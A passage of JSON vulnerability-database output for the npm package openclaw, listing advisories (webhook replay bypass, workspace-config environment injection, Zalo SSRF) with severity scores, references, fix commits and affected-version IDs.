"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41351" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:33:40Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-webhook-replay-detection-bypass-via-base64-signature-re-encoding" }, { "reference_url": "https://github.com/advisories/GHSA-37v6-fxx8-xjmx", "reference_id": "GHSA-37v6-fxx8-xjmx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-37v6-fxx8-xjmx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41351", "GHSA-37v6-fxx8-xjmx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jdqk-kv8u-xqa9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89392?format=api", "vulnerability_id": "VCID-jhah-j2td-t3dp", "summary": "OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n## Summary\nIncomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.23-2`\n- Patched versions: `>= 2026.3.24`\n- First stable tag containing the fix: `v2026.3.24`\n\n## Fix Commit(s)\n- `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.24`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @YLChen-007 for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41384", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03582", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03589", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03575", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41384" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c2fb7f1948c3226732a630256b5179a60664ec24" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-vfw7-6rhc-6xxg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41384", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41384" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:11:06Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-config-in-cli-backend" }, { "reference_url": "https://github.com/advisories/GHSA-vfw7-6rhc-6xxg", "reference_id": "GHSA-vfw7-6rhc-6xxg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vfw7-6rhc-6xxg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-utv2-tyje-kfht" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vv2u-u7mn-rfe1" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24" } ], "aliases": [ "CVE-2026-41384", "GHSA-vfw7-6rhc-6xxg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jhah-j2td-t3dp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93303?format=api", "vulnerability_id": "VCID-jshg-1pb2-wbak", "summary": "OpenClaw validates Zalo outbound photo URLs through the SSRF guard\n## Summary\nZalo outbound photo URLs are validated through the SSRF guard.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nThe Zalo plugin could forward an attacker-controlled outbound photo URL to the Zalo Bot API without first applying OpenClaw's SSRF validation policy.\n\n## Fix\nZalo sendPhoto now parses and validates outbound photo URLs with the shared SSRF hostname policy before posting to Zalo, and media-reply paths route through the guarded outbound media helpers.\n\n## Fix Commit(s)\n- a65eb1b864b7630c1242a82de9e5799b80583c3f\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @foodlook for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44116", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13839", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13842", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00048", "scoring_system": "epss", "scoring_elements": "0.1519", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44116" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:59:02Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a65eb1b864b7630c1242a82de9e5799b80583c3f" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2hh7-c75g-qj2r", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", 